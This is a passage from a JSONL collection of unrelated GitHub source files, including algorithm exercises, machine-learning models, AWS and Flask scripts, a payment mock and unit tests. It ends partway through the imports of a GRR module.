length))\n return weights\n\n#def score(x):\n \n\n#def lookuptext(text):\n","repo_name":"chungs1/tldr","sub_path":"tf_idf.py","file_name":"tf_idf.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"70070810996","text":"class Solution:\n def spiralOrder(self, matrix):\n self.matrix = matrix\n self.height = len(matrix) - 1\n self.lenght = len(matrix[0])\n \n self.i = 0\n self.j = 0\n self.result = []\n self.counter = len(matrix) * len(matrix[0])\n while self.counter > 0:\n self.right()\n self.i += 1\n self.lenght -= 1\n self.down()\n self.j -= 1\n self.height -= 1\n self.left()\n self.i -= 1\n self.lenght -= 1\n self.up()\n self.j += 1\n self.height -= 1\n return self.result\n \n def right(self):\n if self.counter <= 0:\n return\n for x in range(self.lenght):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.j += 1\n self.j -= 1\n return\n \n def left(self):\n if self.counter <= 0:\n return\n for x in range(self.lenght):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.j -= 1\n self.j += 1\n return\n \n def down(self):\n if self.counter <= 0:\n return\n for x in range(self.height):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.i += 1\n self.i -= 1\n return\n \n def up(self):\n if self.counter <= 0:\n return\n for x in range(self.height):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.i -= 1\n self.i += 1\n return\n\nmatrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\nd = Solution()\nprint(d.spiralOrder(matrix))","repo_name":"juanpedrovel/bomboclap","sub_path":"algorithms_and_data_structures/arrays/Spiral Order.py","file_name":"Spiral Order.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20189195980","text":"from pathlib import Path\nfrom copy import deepcopy\n\nclass IntCode:\n def __init__(self, program):\n self.program = program\n\n def 
parse(self):\n return list(map(int, deepcopy(self.program).strip().split(\",\")))\n\n def pad(self, value, length):\n diff = (length + 1)- len(value)\n return value + (\"0\" * diff)\n\n def get_mode(self, modes, offset):\n mode_offset = offset - 1\n if mode_offset >= len(modes):\n modes = self.pad(modes, mode_offset)\n\n return int(modes[mode_offset])\n\n def get_value(self, state, position, offset, modes):\n mode = self.get_mode(modes, offset)\n value = None\n if mode == 0:\n value_position = state[position + offset]\n try:\n value = state[value_position]\n\n except Exception as e:\n print(f\"ERROR position[0]={position + offset}, {len(state)}\")\n\n elif mode == 1:\n try:\n value = state[position + offset]\n\n except Exception as e:\n print(f\"ERROR position[1]={position + offset}, {len(state)}\")\n\n else:\n print(f\"ERROR: modes={mode}, {modes}\")\n\n return value\n\n def set_value(self, state, position, offset, value):\n result_position = state[position + offset]\n state[result_position] = value\n\n def run(self, debug=False, quiet=False):\n state = self.parse()\n position = 0\n outputs = list()\n while True:\n settings = str(state[position])\n modes, opcode = settings[:-2][::-1], int(settings[-2:])\n\n if opcode == 1:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, input1 + input2)\n position = position + 4\n\n elif opcode == 2:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, input1 * input2)\n position = position + 4\n\n elif opcode == 3:\n self.set_value(state, position, 1, int(input(\"> \")))\n position = position + 2\n\n elif opcode == 4:\n input1 = self.get_value(state, position, 1, modes)\n if not quiet:\n print(f\"-> {input1}\")\n\n outputs.append(input1)\n position = position + 2\n\n elif opcode == 5:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n if input1 != 0:\n position = input2\n\n else:\n position = position + 3\n\n elif opcode == 6:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n if input1 == 0:\n position = input2\n\n else:\n position = position + 3\n\n elif opcode == 7:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, 1 if input1 < input2 else 0)\n position = position + 4\n\n elif opcode == 8:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, 1 if input1 == input2 else 0)\n position = position + 4\n\n elif opcode == 99:\n break\n\n else:\n print(f\"ERROR: {position}, {opcode}\")\n break\n\n if debug:\n return state\n\n return outputs\n\nif __name__ == \"__main__\":\n ic = IntCode(Path(\"../etc/aoc5.txt\").read_text())\n\n result1 = ic.run(quiet=True)\n print(\"Part 1\", result1[-1])\n\n result2 = ic.run(quiet=True)\n print(\"Part 2\", result2[-1])\n","repo_name":"aewens/aoc19","sub_path":"py/aoc5.py","file_name":"aoc5.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"43606122173","text":"# -*- coding=utf-8 -*-\n\nimport json\nfrom hashlib import md5\n\nfrom tyframework.context import TyContext\nfrom tysdk.entity.paythird.helper import PayHelper\n\n\nclass 
MockZhangyue(object):\n @classmethod\n def __calc_callback_sign(cls, rparam):\n paykey_dict = TyContext.Configure.get_global_item_json('zhangyue_paykeys', {})\n paykey = str(paykey_dict[rparam['appId']])\n transData = rparam['transData']\n check_str = (rparam['merId'] + '|' +\n rparam['appId'] + '|' +\n transData['orderId'] + '|' +\n transData['payAmt'] + '|' +\n paykey)\n m = md5()\n m.update(check_str)\n digest = m.hexdigest().lower()\n return digest\n\n @classmethod\n def mock(cls, params):\n ''' args: paytype, pay version (v1/v3), platformOrderId, price,\n expect (expected result) '''\n\n postparams = {}\n transData = {}\n postparams['appId'] = '3e02f7a3e7fd2ca62cc3'\n postparams['merId'] = '691'\n transData['orderId'] = '11133'\n transData['merOrderId'] = params['platformOrderId']\n transData['payAmt'] = params['price']\n postparams['transData'] = transData\n transData['md5SignValue'] = cls.__calc_callback_sign(postparams)\n postparams['transData'] = json.dumps(transData)\n cburl = PayHelper.getSdkDomain() + '/v1/pay/zhangyue/callback'\n # use GET instead of POST for now\n response, _ = TyContext.WebPage.webget(cburl, postdata_=postparams)\n return 'zhangyue ok'\n","repo_name":"csirui/hall0","sub_path":"source/tygame-sdk/src/tysdk/entity/mock/mockzhangyue.py","file_name":"mockzhangyue.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"7305172132","text":"from socket import AF_INET, socket, SOCK_STREAM\nfrom threading import Thread\nimport tkinter\nfrom PIL import ImageTk ,Image\n\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport tensorflow_datasets as tfds\n\nc=0\n\nnew_model = tf.keras.models.load_model('saved_model\\my_model')\nmodel=new_model\n\n\ndef nlp(msg1):\n sentiment=\"\"\n predictions = model.predict(tf.expand_dims(msg1, 0))\n if(predictions>=0.5):\n sentiment='Positive'\n else:\n sentiment='Negative'\n return sentiment\n\ndef receive():\n \"\"\"Handles receiving of messages.\"\"\"\n while True:\n try:\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\n msg_list.insert(tkinter.END, msg)\n except OSError: # Possibly client has left the chat.\n break\n\ndef send(event=None): # event is passed by binders.\n \"\"\"Handles sending of messages.\"\"\"\n msg = my_msg.get()\n my_msg.set(\"\") # Clears input field.\n global c\n if(c==0):\n client_socket.send(bytes(msg, \"utf8\"))\n my_msg.set(\"\") # Clears input field.\n c=c+1\n else:\n mood=nlp(msg)\n msg2=msg+\"(\"+mood+\")\"\n my_msg.set(\"\") # Clears input field.\n client_socket.send(bytes(msg2, \"utf8\"))\n if msg == \"{quit}\":\n client_socket.close()\n top.quit()\n\n\ndef on_closing(event=None):\n \"\"\"This function is to be called when the window is closed.\"\"\"\n my_msg.set(\"{quit}\")\n send()\ntop = tkinter.Tk()\ntop.title(\"TextaPhone\")\n\nsendphoto = ImageTk.PhotoImage(Image.open (\"SEND.png\") )\n\nmessages_frame = tkinter.Frame(top)\nmy_msg = tkinter.StringVar() # For the messages to be sent.\nscrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.\n# Following will contain the messages.\nmsg_list = tkinter.Listbox(messages_frame, height=30, width=70, yscrollcommand=scrollbar.set, bd =3 )\nscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\nmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\nmsg_list.pack()\nmessages_frame.pack()\n\nentry_field = tkinter.Entry(top, textvariable=my_msg, bd =5, width=50)\nentry_field.bind(\"\", 
send)\nentry_field.pack(side = tkinter.LEFT, padx=50)\nsend_button = tkinter.Button(top, text=\"Send\", command=send, image = sendphoto, bd=0)\nsend_button.pack()\ntop.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n\n#----Now comes the sockets part----\nHOST = '127.0.0.1'\nPORT = '33000'\nif not PORT:\n PORT = 33000\nelse:\n PORT = int(PORT)\n\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\nclient_socket = socket(AF_INET, SOCK_STREAM)\nclient_socket.connect(ADDR)\n\nreceive_thread = Thread(target=receive)\nreceive_thread.start()\n\ntkinter.mainloop() # Starts GUI execution.","repo_name":"bhagyeshrane/twomodecalling","sub_path":"textonly.py","file_name":"textonly.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"15307168781","text":"\n\n\np = dict(\n seq_len = 36, #32\n criterion = nn.MSELoss(),\n n_feature_maps=36,\n max_epochs = 200,\n learning_rate = 0.004,\n)\n\n\nclass TSResnet(pl.LightningModule):\n def __init__(self, \n input_size,\n output_size,\n learning_rate = p[\"learning_rate\"],\n n_feature_maps = p[\"n_feature_maps\"],\n criterion=nn.MSELoss()):\n super(TSResnet, self).__init__()\n \n self.input_size = input_size\n self.output_size = output_size\n self.learning_rate = learning_rate\n self.criterion = criterion\n self.n_feature_maps = n_feature_maps\n self.activation = nn.ReLU()\n self.block1 = conv_block(self.input_size, self.n_feature_maps)\n self.shortcut1conv = nn.Conv1d(self.input_size, self.n_feature_maps, 1)\n self.shortcut1bn = nn.BatchNorm1d(self.n_feature_maps)\n\n self.block2 = conv_block(self.n_feature_maps, 2*self.n_feature_maps)\n self.shortcut2conv = nn.Conv1d(self.n_feature_maps, 2*self.n_feature_maps, 1)\n self.shortcut2bn = nn.BatchNorm1d(2*self.n_feature_maps)\n \n self.block3 = conv_block(2*self.n_feature_maps, 2*self.n_feature_maps)\n self.shortcut3bn = nn.BatchNorm1d(2*self.n_feature_maps)\n self.adavgpool = nn.AdaptiveAvgPool1d(36)\n self.avgpool = nn.AvgPool1d(36)\n self.linear1 = nn.Linear(2*self.n_feature_maps, self.n_feature_maps)\n self.drop = nn.Dropout(0.8)\n self.linear2 = nn.Linear(self.n_feature_maps, self.output_size)\n\n\n def forward(self, x):\n convz = self.block1(x)\n shortcuty = self.shortcut1conv(x)\n shortcuty = self.shortcut1bn(shortcuty)\n output_block1 = convz+shortcuty\n output_block1 = self.activation(output_block1)\n \n convz = self.block2(output_block1)\n shortcuty = self.shortcut2conv(output_block1)\n shortcuty = self.shortcut2bn(shortcuty)\n output_block2 = convz+shortcuty\n output_block2 = self.activation(output_block2)\n \n convz = self.block3(output_block2)\n shortcuty = self.shortcut2bn(output_block2)\n output_block3 = convz+shortcuty\n output_block3 = self.activation(output_block3)\n\n # adpooled = self.adavgpool(output_block3)\n # print(\"pooled\", adpooled.shape)\n pooled = self.avgpool(output_block3)\n # print(\"pooled\", pooled.shape)\n output =self.linear1(pooled.reshape(pooled.shape[0],-1))\n output =self.drop(output)\n y_pred = self.linear2(output)\n return y_pred\n\n \n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n lr_lambda = lambda epoch: .9**epoch\n scheduler = torch.optim.lr_scheduler.MultiplicativeLR(optimizer,\n lr_lambda=lr_lambda,\n verbose=True)\n return {\n 'optimizer': optimizer,\n 'lr_scheduler': scheduler,\n }\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n x = torch.squeeze(x).float() \n y = torch.squeeze(y).float() \n y_hat = 
self.forward(x)\n loss = self.criterion(y.float(), y_hat)\n self.log(\"train/mse\", loss, on_step=False, on_epoch=True, prog_bar=False, logger=True)\n # self.logger.experiment.add_scalars(\"losses\", {\"train_loss\": loss})\n return {\"loss\":loss, \"mse\":loss, \"step\":self.current_epoch}\n\n def validation_step(self, batch, batch_idx):\n x, y = batch \n x = torch.squeeze(x).float() \n y = torch.squeeze(y).float() \n y_hat = self.forward(x)\n loss = self.criterion(y.float(), y_hat)\n self.log(\"val/mse\", loss, on_step=False, on_epoch=True)\n return {\"val_mse\":loss, \"step\":self.current_epoch}\n\n\n def training_epoch_end(self, outputs):\n avg_mse = torch.stack([x['mse'] for x in outputs]).mean()\n avg_step = np.mean([x['step'] for x in outputs])\n tensorboard_logs = {'train/loss': avg_mse}\n self.logger.experiment.add_scalars(\"metrics\", {\"tr_rmse\": avg_mse}, global_step=avg_step)\n\n def validation_epoch_end(self, outputs):\n avg_mse = torch.stack([x['val_mse'] for x in outputs]).mean()\n avg_step = np.mean([x['step'] for x in outputs])\n tensorboard_logs = {'val/loss': avg_mse}\n self.logger.experiment.add_scalars(\"metrics\", {\"val_mse\": avg_mse}, global_step=avg_step)\n\n def test_step(self, batch, batch_idx):\n x, y = batch \n x = torch.squeeze(x).float() \n y = torch.squeeze(y).float() \n y_hat = self(x)\n loss = self.criterion(y_hat, y)\n self.log(\"test/mse\", loss, on_step=False, on_epoch=True)\n return {\"test_loss\": loss}\n\n\n\n","repo_name":"marcalph/stuff","sub_path":"ts/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"70911271476","text":"import boto3\n\ns3 = boto3.client('s3')\n\n# 1.- Realizamos la consulta mediante S3Select\nresp = s3.select_object_content(\n Bucket='iabd-boto3',\n Key='TMDb_updated.csv',\n ExpressionType='SQL',\n Expression=\"SELECT s.title, s.overview, s.vote_count, s.vote_average FROM s3object s WHERE cast(s.vote_count as int)> 10000\",\n InputSerialization={'CSV': {\"FileHeaderInfo\": \"USE\",\n 'AllowQuotedRecordDelimiter': True},\n 'CompressionType': 'NONE'},\n OutputSerialization={'CSV': {}},\n)\n\n\n# 2.- Unimos los datos que vamos recibiendo en streaming\nregistros = [\"title,overview,vote_count,vote_average\\n\"]\nfor evento in resp['Payload']:\n if 'Records' in evento:\n print(evento['Records']['Payload'].decode())\n registros.append(evento['Records']['Payload'].decode())\n\n# 3.- Generamos el contenido en un String\nfile_str = ''.join(registros)\n\n# 4.- Creamos un nuevo objeto en S3\ns3.put_object(Body=file_str, Bucket='iabd-boto3',\n Key=\"TMDb_filtered.csv\")\n","repo_name":"yepes/IABD","sub_path":"aws/python/s3select.py","file_name":"s3select.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6773644185","text":"class Solution:\n def minSpeedOnTime(self, dist: List[int], hour: float) -> int:\n # copy book --> binary search min speed, check if total hours <= hours\n\n # base case --> if prev stops > hour --> return -1\n if len(dist) - 1 >= hour:\n return -1\n\n left, right = 1, 10 ** 7\n\n while left <= right:\n mid = left + (right - left) // 2\n if self.getHours(dist, mid, hour) <= hour: # less hour, higher speed --> move to left to lower speed\n right = mid - 1\n else:\n left = mid + 1\n return left\n\n def getHours(self, dist, speed, hour):\n count = 0\n for i in range(len(dist)):\n if i 
== len(dist) - 1:\n count += dist[i] / speed\n continue\n count += math.ceil(dist[i] / speed)\n if count > hour:\n return count\n return count","repo_name":"rligithub/Leetcode","sub_path":"BinarySearch/1870. Minimum Speed to Arrive on Time.py","file_name":"1870. Minimum Speed to Arrive on Time.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"28436849026","text":"from skimage import io\nimport cv2\nimport numpy as np\nfrom batchgenerators.utilities.file_and_folder_operations import *\nimport argparse\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-data_path\",\n help=\"percentage of the dataset used for training validation and test\")\n args = parser.parse_args()\n data_path = args.data_path\n output_path = join(data_path, 'zone_fronts')\n\n train_front_path = join(data_path, 'fronts_dilated_5', 'train')\n test_front_path = join(data_path, 'fronts_dilated_5', 'test')\n train_zone_path = join(data_path, 'zones', 'train')\n test_zone_path = join(data_path, 'zones', 'test')\n\n train_output_path = join(output_path, 'train')\n test_output_path = join(output_path, 'test')\n\n maybe_mkdir_p(output_path)\n maybe_mkdir_p(train_output_path)\n maybe_mkdir_p(test_output_path)\n\n kernel = np.ones((5, 5), 'uint8')\n\n\n # Train\n for train_file in os.listdir(train_front_path):\n print(train_file)\n # load image\n front_path = join(train_front_path, train_file)\n zone_path = join(train_zone_path, train_file[:-len('front.png')]+'zones.png')\n front = io.imread(front_path)\n zone = io.imread(zone_path)\n\n zone[front==255] = 32\n\n # store image\n output_file_path = join(train_output_path, train_file[:-len('front.png')]+'.png')\n io.imsave(output_file_path, zone)\n\n\n for test_file in os.listdir(test_front_path):\n print(test_file)\n # load image\n front_path = join(test_front_path, test_file)\n zone_path = join(test_zone_path, test_file[:-len('front.png')] + 'zones.png')\n front = io.imread(front_path)\n zone = io.imread(zone_path)\n\n zone[front == 255] = 32\n\n # store image\n output_file_path = join(test_output_path, test_file[:-len('front.png')] + '.png')\n io.imsave(output_file_path, zone)","repo_name":"ho11laqe/nnUNet_calvingfront_detection","sub_path":"utils_new/combine_labels.py","file_name":"combine_labels.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"36625354279","text":"import py2neo\nimport pandas as pd\nfrom numpy import int64\nfrom collections import Counter\n\ndb = py2neo.Graph(password='neo.log')\n\n# Actual Urea Cycle data codes which will be tested as possible children of high-level codes\ndf = pd.read_csv('urea_cycle_data.csv', encoding='utf-8', dtype={'Source':'str', 'SourceName':'str', 'Number of Patient':'int'})\nids = df.Source.tolist()\nn_ids = len(ids)\n\n# High-level codes which will be tested for how many data codes they are parents of\n# ID\tlevel\tbelow\tabove\tFSN\tName\tModule\nparent_df = pd.read_csv('urea_parent_nodes.csv', encoding='utf-8', dtype='str')\nparent_ids = parent_df.ID.tolist()\nn_parents = len(parent_ids)\n\n# Force integer type of the count because was putting decimal places in file...\nparent_df['n_matches'] = int64(0)\n\n# Paths leading to high-level (coarse) nodes\nprint('starting...')\nfor ii, id in enumerate(parent_ids):\n # Below (number of IDs with shortest paths less than 12 steps leading up to 
current ID)\n nn = db.data(\"\"\"WITH {idslist} AS ids \n UNWIND ids AS id \n MATCH p=shortestpath((o1:ObjectConcept {{ sctid: id}})-[:ISA*0..12]->(o2:ObjectConcept {{ sctid: '{id_val}' }})) \n RETURN o2.sctid as parent, collect(id) as children;\"\"\".format(idslist=str(ids), id_val=id))\n if len(nn) > 0:\n parent_node = nn[0]['parent']\n child_nodes = nn[0]['children']\n print(ii, '/', n_parents, ' : ', parent_node, ' : ', len(child_nodes))\n parent_df.loc[parent_df['ID'] == id, 'n_matches'] = len(child_nodes)\n parent_df.loc[parent_df['ID'] == id, 'match_ids'] = '|'.join(child_nodes)\n else:\n print(ii, '/', n_parents, ' : ', parent_node, ' : 0')\n\nparent_df.to_csv('urea_child_nodes.csv', index=False, encoding='utf-8')\n","repo_name":"emonson/neo4j-snomed","sub_path":"urea_child_nodes.py","file_name":"urea_child_nodes.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"38418562016","text":"#import os\nfrom flask import Flask, flash, redirect, render_template, request, jsonify\n#from random import randint\nimport config\nimport json\nfrom googleapiclient.discovery import build\nimport requests\nfrom isodate import parse_duration\n\napp = Flask(__name__, static_folder='static')\n\n@app.route(\"/\")\ndef stats_title():\n\n youtube = build('youtube', 'v3', developerKey=config.developer_key)\n channel_request = youtube.channels().list(\n part='snippet,statistics',\n id=config.channel_id)\n channel_response = channel_request.execute()\n\n url = f'https://www.googleapis.com/youtube/v3/search?part=snippet&channelId={config.channel_id}&maxResults=1&order=date&type=video&key={config.developer_key}'\n\n search_response = requests.get(url).json()\n video_id = search_response['items'][0]['id']['videoId']\n\n url = f'https://www.googleapis.com/youtube/v3/videos?part=contentDetails&id={video_id}&key={config.developer_key}'\n response = requests.get(url)\n data = json.loads(response.text)\n video_duration = data['items'][0]['contentDetails']['duration']\n parsed_duration = parse_duration(video_duration)\n hours = parsed_duration.seconds // 3600\n minutes = (parsed_duration.seconds % 3600) // 60\n seconds = parsed_duration.seconds % 60\n\n duration_string = f\"{hours} hours, {minutes} minutes, {seconds} seconds\"\n\n return render_template('stats.html', \\\n channel_resource=channel_response, \\\n search_resource=search_response, \\\n latest_video_duration=duration_string)\n \nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)","repo_name":"pswapneet/yt-stats-flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6325046335","text":"\"\"\"\nThis module contains tests for the Size class\n\"\"\"\n\nfrom unittest import TestCase\nfrom mock import MagicMock, patch\nfrom doboto import Size\n\n\nclass TestSize(TestCase):\n \"\"\"\n This class implements unittests for the Size class\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Define resources usable by all unit tests\n \"\"\"\n\n self.test_url = \"http://abc.example.com\"\n self.test_uri = \"{}/sizes\".format(self.test_url)\n self.test_do = \"do\"\n self.test_token = \"abc123\"\n self.test_agent = \"Unit\"\n self.instantiate_args = (self.test_do, self.test_token, self.test_url, self.test_agent)\n\n self.klass_name = \"Size\"\n self.klass = getattr(Size, self.klass_name)\n\n def 
test_class_exists(self):\n \"\"\"\n Size class is defined\n \"\"\"\n\n self.assertTrue(hasattr(Size, self.klass_name))\n\n def test_can_instantiate(self):\n \"\"\"\n Size class can be instantiated\n \"\"\"\n\n exc_thrown = False\n\n try:\n self.klass(*self.instantiate_args)\n except Exception:\n exc_thrown = True\n\n self.assertFalse(exc_thrown)\n\n @patch('doboto.Size.Size.pages')\n def test_list_happy(self, mock_pages):\n \"\"\"\n list works with happy path\n \"\"\"\n\n size = self.klass(*self.instantiate_args)\n result = size.list()\n\n mock_pages.assert_called_with(self.test_uri, \"sizes\")\n","repo_name":"gaf3/doboto","sub_path":"tests/test_Size.py","file_name":"test_Size.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"26286759013","text":"\n'''Import necessary libraries'''\n\nfrom skimage import io\nfrom skimage.exposure import histogram\nfrom skimage.filters import gaussian\n#import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom skimage.filters import roberts, sobel, prewitt\nimport os\npath = r'D:\\Digital_Image_Processing\\Homework_3'\n\n'''Get the path to the image'''\nos.chdir(path)\n\nimg_txt = os.listdir()[0]\n\n\n'''Problem 1'''\n\n\n'''Read the image'''\nimage = io.imread(img_txt,as_gray=True)\n'''compute the histogram of the grayscale image, using local neighborhood of \neach pixel'''\nplt.imshow(image,cmap = 'gray')\nhist, centers = histogram(image,nbins=256)\n#plt.hist(hist, bins = centers.size)\n'''Juxtapose the image with its corresponding histrgram'''\nfig, ax = plt.subplots(ncols=2, figsize=(10, 5))\nax[0].imshow(image, interpolation='nearest', cmap=plt.cm.gray)\nax[0].axis('off')\nax[1].plot(centers, hist, lw=2)\nax[1].set_title('Histogram of grey values')\n\n#####################################################################################3\n\n'''Problem 2'''\nn_cols = 4\ncmap = 'gray'\nedge_sobel = sobel(image)\nedge_roberts = roberts(image)\nedge_prewitt = prewitt(image)\nimg_list = [(image,'Original'),(edge_sobel,'Sobel filter'),(edge_roberts,'Roberts filter'),(edge_prewitt,'Prewitt filter')]\n#edge_sobel = np.reshape(edge_sobel,image.shape)\nfig,ax = plt.subplots(ncols = n_cols, figsize=(14,7))\nfor i,im in enumerate(img_list):\n ax[i].imshow(im[0],cmap=cmap)\n ax[i].axis('off')\n ax[i].set_title(im[1])\n \n##############################################################################################\n\n'''Problem 3'''\nfig,ax = plt.subplots(ncols = n_cols, figsize=(14,7))\nsigma_list = [0.3,0.8,1.0]\nax[0].imshow(image,cmap = cmap)\nax[0].axis('off')\nax[0].set_title('Original')\nfor i,im in enumerate(sigma_list):\n gauss = gaussian(image,sigma = im)\n ax[i+1].imshow(gauss,cmap = cmap)\n ax[i+1].axis('off')\n ax[i+1].set_title('Sigma = '+str(im))\n\n\n","repo_name":"tiger-bug/Digital_Image_Processing","sub_path":"Homework_3/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"1578417530","text":"# Implementation of TF-IDF\n# Some ideas inspired by code at https://code.google.com/p/tfidf/\n# Used by the text_utils module to extract keywords from paper titles + abstracts\n\nimport re\nimport operator\nimport math\nfrom nltk import stem\n\nclass Tfidf(object):\n\t\n\tdef __init__(self):\n\t\tself.corpus = []\n\t\tself.idf_dict = {}\n\t\tself.num_texts = 0\n\n\tdef add_text(self, text):\n\t\t\"\"\"\n\t\tAdds the 
given text to the corpus by splitting it and adding each individual word as a key to the idf_dict\n\t\t(or incrementing the value if key already present)\n\t\t\"\"\"\n\t\tself.num_texts += 1\n\t\twords = re.split(\"[^\\w-]\", text.lower())\n\t\tword_set = set(words)\n\n\t\tfor word in word_set:\n\t\t\tif word in self.idf_dict:\n\t\t\t\tself.idf_dict[word] += 1\n\t\t\telse:\n\t\t\t\tself.idf_dict[word] = 1\n\n\n\tdef count_words(self, text):\n\t\t\"\"\"\n\t\tGiven a text, returns a dict mapping each term in the text to its frequency in the text\n\t\t\"\"\"\n\t\tword_freq = {}\n\t\tall_words = re.split(\"[^\\w-]\", text.lower())\n\t\tword_set = set(all_words)\n\t\tfor word in word_set:\n\t\t\tword_freq[word] = all_words.count(word)\n\n\t\treturn word_freq\n\n\n\tdef get_keywords(self, text, maxkw):\n\t\t\"\"\"\n\t\tGiven a text and max number, returns the highest scoring words up the max number of words\n\t\t\"\"\"\n\t\ttfidf_scores = {}\n\t\t# Get the frequency counts for each word\n\t\tword_freq = self.count_words(text)\n\t\t# Get the tf-idf score for each word\n\t\tfor word in word_freq:\n\t\t\ttfidf_scores[word] = word_freq[word] * math.log(self.num_texts / self.idf_dict[word])\n\n\t\t# Sort the words by their tfidf scores into (word, score) tuples\n\t\tword_score_pairs = sorted(tfidf_scores.items(), key=operator.itemgetter(1), reverse=True)\n\n\t\tkeywords = [word_score[0] for word_score in word_score_pairs]\n\n\t\treturn keywords[:maxkw]\n\n\tdef get_idf_dict(self):\n\t\treturn self.idf_dict\n\n\tdef get_num_texts(self):\n\t\treturn self.num_texts\n\n\n\n","repo_name":"tvzeller/SumProj","sub_path":"grc/glarc/tfidf.py","file_name":"tfidf.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"19130869345","text":"import os , sys,time, collections , math , pprint , itertools as it , operator as op , bisect as bs ,functools as fn\nmaxx , localsys , mod = float('inf'), 0 , int(1e9 + 7) \nnCr = lambda n, r: reduce(mul, range(n - r + 1, n + 1), 1) // factorial(r)\nceil = lambda n , x: (n+x -1 )//x \nosi, oso = '/home/priyanshu/Documents/cp/input.txt','/home/priyanshu/Documents/cp/output.txt'\nif os.path.exists(osi):\n\tsys.stdin = open(osi, 'r') ; sys.stdout = open(oso, 'w')\n\t\ninput = sys.stdin.readline\n\ndef maps():return map(int , input().split())\n\n\nn , k , x= maps() ; a = sorted(maps())\ns = sorted([(a[i] - a[i-1]) for i in range(1 , n ) if a[i] - a[i-1] > x ]) ; l = len(s) + 1\nfor i in s:\n\tp = i//x\n\tif i % x ==0:\n\t\tp-=1\n\tif p <= k :\n\t\tk-=p;l-=1\n\telse:\n\t\tbreak\nprint(l)\n","repo_name":"gitnoober/cp","sub_path":"misc/practice/stable_groups.py","file_name":"stable_groups.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"19884970430","text":"#!/usr/bin/env python\n\"\"\"Administrative flows for managing the clients state.\"\"\"\n\n\nimport shlex\nimport threading\nimport time\nimport urllib\n\nimport logging\n\n# pylint: disable=unused-import\nfrom grr.gui import django_lib\n# pylint: enable=unused-import\nfrom grr.lib import access_control\nfrom grr.lib import aff4\nfrom grr.lib import config_lib\nfrom grr.lib import data_store\nfrom grr.lib import email_alerts\nfrom grr.lib import flow\nfrom grr.lib import rdfvalue\nfrom grr.lib import registry\nfrom grr.lib import rendering\nfrom grr.lib import stats\nfrom grr.lib import utils\nfrom grr.lib.aff4_objects import 
